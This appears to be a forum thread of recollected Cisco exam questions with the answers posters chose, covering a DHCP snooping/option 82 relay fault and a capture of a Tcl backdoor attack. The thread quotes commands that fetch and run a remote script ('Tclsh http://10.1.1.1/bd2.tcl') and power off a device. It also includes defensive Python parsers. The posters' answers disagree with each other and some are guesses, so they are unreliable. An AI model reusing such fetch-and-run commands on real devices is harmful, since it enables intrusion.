DIAG DHCP SNOOPING: The tech server support are having difficulties to install and activate the new server in vlan 100.
Tech Support: Hi, we are trying to install a new server in the vlan 100, but the server isn't getting any IP address via DHCP. We tested all the drivers and the server is working fine. We did the tests below in the server:
The Network L2 Support team provided some output for you to analyze, please take a look:
Topology:
Questions:
traffic_capture_DHCP_SNOOP_000.pcapng
What line of the packet capture identifies the problem?
1; 2; 3; 4; -----> HERE 5; 6; 7; 8; 9; 10; 11;
Why did you choose this frame from the packet capture?
Bpdu blocking from SW1; DHCP information option disabled but IP relay agent address set; DHCP discover from port 67; UDP port 69; DHCP discover to port 67, source is broadcast; DHCP information option enabled but IP relay agent address unset; -----> HERE
Select the point where the packet was captured: SW1 -> SW2 -----> HERE; SERVER -> SW1; SW1 -> DHCP SERVER; SW3 -> SW4; SERVER2 -> SW3; SW4 -> DHCP SERVER
TCL Scripting: We found suspect traffic going between some IP addresses in our network, please take a look at the packet capture:
traffic_capture_TCL_SCRIPTING_000.pcapng
What can we infer from the packet capture (choose 4 options)?
tcl loaded into 10.1.1.2 memory via http; -----> HERE tcp connection from 10.1.1.2 to 10.1.1.1 on port 300; tcl loaded into 10.1.1.2 memory via https; tcp connection from 10.1.1.1 to 10.1.1.2 on port 300; -----> HERE 10.1.1.1 gets vty line access to 10.1.1.2; -----> HERE 10.1.1.2 gets vty line access to 10.1.1.1; installs ransomware via backdoor; -----> HERE installs backdoor via ransomware;
What command can disrupt the box?
Sharkfest; Kill; Sudo poweroff; -----> HERE Kill -9;
What command could be the source of the problem?
Copy http://10.1.1.1/bd2.tcl; Tclsh http://10.1.1.1/bd2.tcl; -----> HERE http://10.1.1.1/bd2.tcl;
II. DIAG (Newest DIAG)
1. DHCP Snooping Problem
Resource: - server, L2SW (snooper), L3SW (relay), and DHCP server (router) log - wireshark - topology is almost the same as what is shared in this forum.
Question 1: Which line? - 3. Input bootp in the filter of wireshark and choose the first DHCP Discovery packet.
Question 2-1: Which device has the issue? - L3SW. Cisco says clearly which switch is snooper, which switch is relay; mine was SW1 L3SW (relay).
Question 2-2: Which command shows the issue? - show ip dhcp relay information trusted.
Question 3: Which link captured the packet? - Btw SW1 and SW3.
2. Attacker/Victim Problem
Resource: wireshark
Question 1: What can you see? Same in this forum.
Question 2: How can the attacker bring down all the system? I tried to understand the tcl script via TCP follow stream but didn't understand. Finally, select "poweroff".
Question 3: How does the attacker attack? Not sure but choose something like tclsh copy... flash:. There were 2 options, tftp://10.1.1.1/bd2.tcl and tftp://10.1.1.2/bd2.tcl, and I don't know which is correct. I chose tftp://10.1.1.2/bd2.tcl.

DHCP: Searched by bootp.
1. What frame? Frame 44
2. What do you see? IP relay information with giaddr 0
3. Packet captured from? Trunk link between SW1 and SW3.
HACKER:
Q1. As mentioned here. http.request.method GET
Q2. Sad smiley, because it was saying hope you have a backup.
Q3. Copy tftp to flash. I don't remember this option. You have to follow the tcp stream. It is available in Analyze > Follow TCP Stream in the capture.
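The drop condition the posts above describe (option 82 already present while giaddr is still 0.0.0.0, and no trusted relay source configured), as an added example that is not from the thread: it constructs a DHCP Discover the way a snooping switch forwards it and applies the check a downstream relay makes before forwarding. The sub-option values, MAC address and transaction id are constructed placeholders.

```python
import struct

DHCP_MAGIC = b"\x63\x82\x53\x63"
OPT_MSG_TYPE, OPT_RELAY_AGENT, OPT_END = 53, 82, 255
MSG_TYPES = {1: "DISCOVER", 2: "OFFER", 3: "REQUEST", 5: "ACK"}

def build_discover(chaddr: bytes, giaddr: str, with_opt82: bool) -> bytes:
    """Constructed BOOTP/DHCP Discover (test input, not a frame from the thread's capture)."""
    giaddr_b = bytes(int(o) for o in giaddr.split("."))
    hdr = struct.pack("!BBBBIHH4s4s4s4s16s64s128s",
                      1, 1, 6, 0,             # op=BOOTREQUEST, htype=Ethernet, hlen=6, hops
                      0x3903F326, 0, 0x8000,  # xid, secs, flags (broadcast bit)
                      b"\0" * 4, b"\0" * 4, b"\0" * 4, giaddr_b,
                      chaddr.ljust(16, b"\0"), b"\0" * 64, b"\0" * 128)
    opts = bytes([OPT_MSG_TYPE, 1, 1])  # option 53 = DHCPDISCOVER
    if with_opt82:
        # What a snooping switch inserts: sub-option 1 circuit-id (vlan 100, port 5) and
        # sub-option 2 remote-id (switch MAC); all values constructed for this example.
        sub = b"\x01\x04\x00\x64\x00\x05" + b"\x02\x06" + bytes.fromhex("0011223344aa")
        opts += bytes([OPT_RELAY_AGENT, len(sub)]) + sub
    return hdr + DHCP_MAGIC + opts + bytes([OPT_END])

def parse_options(pkt: bytes) -> dict:
    """Return {option_code: raw_value} from the DHCP options field."""
    if pkt[236:240] != DHCP_MAGIC:
        raise ValueError("no DHCP magic cookie: not a DHCP packet")
    opts, i = {}, 240
    while i < len(pkt) and pkt[i] != OPT_END:
        if pkt[i] == 0:  # pad option carries no length byte
            i += 1
            continue
        code, length = pkt[i], pkt[i + 1]
        opts[code] = pkt[i + 2:i + 2 + length]
        i += 2 + length
    return opts

def diagnose(pkt: bytes, relay_trusted: bool) -> dict:
    """Check a downstream relay applies to a client packet; relay_trusted mirrors
    'ip dhcp relay information trust-all' / 'ip dhcp relay information trusted'."""
    opts = parse_options(pkt)
    giaddr = ".".join(str(b) for b in pkt[24:28])  # giaddr sits at bytes 24-27 of the header
    mtype = MSG_TYPES.get(opts.get(OPT_MSG_TYPE, b"\0")[0], "UNKNOWN")
    has_opt82 = OPT_RELAY_AGENT in opts
    # Option 82 with giaddr 0.0.0.0 means a snooping switch, not a relay, inserted it; with
    # no trusted source configured the relay drops it, which is the symptom in the thread.
    dropped = has_opt82 and giaddr == "0.0.0.0" and not relay_trusted
    return {"msg_type": mtype, "giaddr": giaddr, "has_opt82": has_opt82,
            "verdict": "DROP" if dropped else "FORWARD"}
```

Running `diagnose` on the same packet with `relay_trusted=True` shows the effect of `show ip dhcp relay information trusted-sources` listing the inbound interface: the frame is forwarded instead of dropped.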
DIAG: this section was completely new and I am not sure if the options I marked were correct. The topology is like this:
Server---- SW3-----SW4
           |        |
           |        |
           SW2-----SW1
Server is in vlan 100 and not getting an IP. Logs are provided for SW3, SW1 and Server. It is asked on which device can we see to guess the problem. SW3's ip dhcp snooping log will tell you that option 82 has been enabled. But SW1's logs will show that there are no interfaces where relay is trusted. So I chose SW2 and the show ip dhcp relay information trusted-sources command.
A packet capture was also given and it was asked which frame pointed towards the problem. I chose the DHCP discover message which showed option 82 as set. The third problem was to select the interface where the packet might have been captured.
2. I don't remember the exact options here. Only packet capture. Shows a lot of TCP session packets being passed between 10.1.1.1 and 10.1.1.2 (Syn, ack, syn ack).
a) The first question was what can we infer from the packet. You had to choose 4 options. In the packet capture you can see that 10.1.1.2 returns a 200 OK to say that the session is good and the file type is text/tcl. So I selected that a TCL script was being passed to 10.1.1.2 via HTTP. There was also a GET http://10.1.1.2/b2.tcl from 10.1.1.1, so we know that 10.1.1.1 is trying to run this script on 10.1.1.2 via http. Another option I selected was that some hacker is trying to install ransomware via backdoor.
b) Which command, if issued from the hacker end, can bring down the complete system? Options were sharkfest, su env poweroff etc. I chose poweroff.
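The inference the posts above read off Follow TCP Stream (a GET for a .tcl file answered with 200 OK and text/tcl), as an added example that is not from the thread: a small analyzer over a constructed reassembled HTTP stream that records the connection, the request, and whether a Tcl script was transferred. The addresses, file name, headers and body are constructed placeholders.

```python
import re

# Constructed reassembled TCP stream, as Wireshark's Follow TCP Stream shows it: client
# request first, then the server reply. Addresses, file name and body are placeholders.
SAMPLE_STREAM = (
    "GET /bd2.tcl HTTP/1.1\r\nHost: 10.1.1.2\r\n\r\n"
    "HTTP/1.1 200 OK\r\nContent-Type: text/tcl\r\nContent-Length: 27\r\n\r\n"
    "# placeholder script body\r\n"
)
BENIGN_STREAM = (
    "GET /index.html HTTP/1.1\r\nHost: 10.1.1.2\r\n\r\n"
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 0\r\n\r\n"
)

REQ_RE = re.compile(r"^(GET|POST|PUT)\s+(\S+)\s+HTTP/1\.[01]", re.M)
RESP_RE = re.compile(r"^HTTP/1\.[01]\s+(\d{3})", re.M)
CT_RE = re.compile(r"^Content-Type:\s*([^\r\n;]+)", re.M | re.I)

def analyze_stream(client: str, server: str, port: int, stream: str) -> dict:
    """Extract request/response facts from one stream and flag a Tcl script moving over HTTP."""
    req, resp, ct = REQ_RE.search(stream), RESP_RE.search(stream), CT_RE.search(stream)
    method, uri = (req.group(1), req.group(2)) if req else ("", "")
    status = int(resp.group(1)) if resp else None
    ctype = ct.group(1).strip().lower() if ct else ""
    path = uri.split("?", 1)[0].lower()
    # The inference from the thread: a 200 OK carrying text/tcl (or a .tcl URI) means a
    # Tcl script was delivered over HTTP, i.e. scripting activity involving a network device.
    tcl_transfer = status == 200 and (path.endswith(".tcl") or ctype == "text/tcl")
    findings = [f"tcp connection from {client} to {server} on port {port}"]
    if req:
        findings.append(f"{method} {uri} requested by {client} (filter: http.request.method)")
    if tcl_transfer:
        findings.append(f"tcl script served by {server} to {client} over http")
    return {"method": method, "uri": uri, "status": status, "content_type": ctype,
            "tcl_transfer": tcl_transfer, "findings": findings}
```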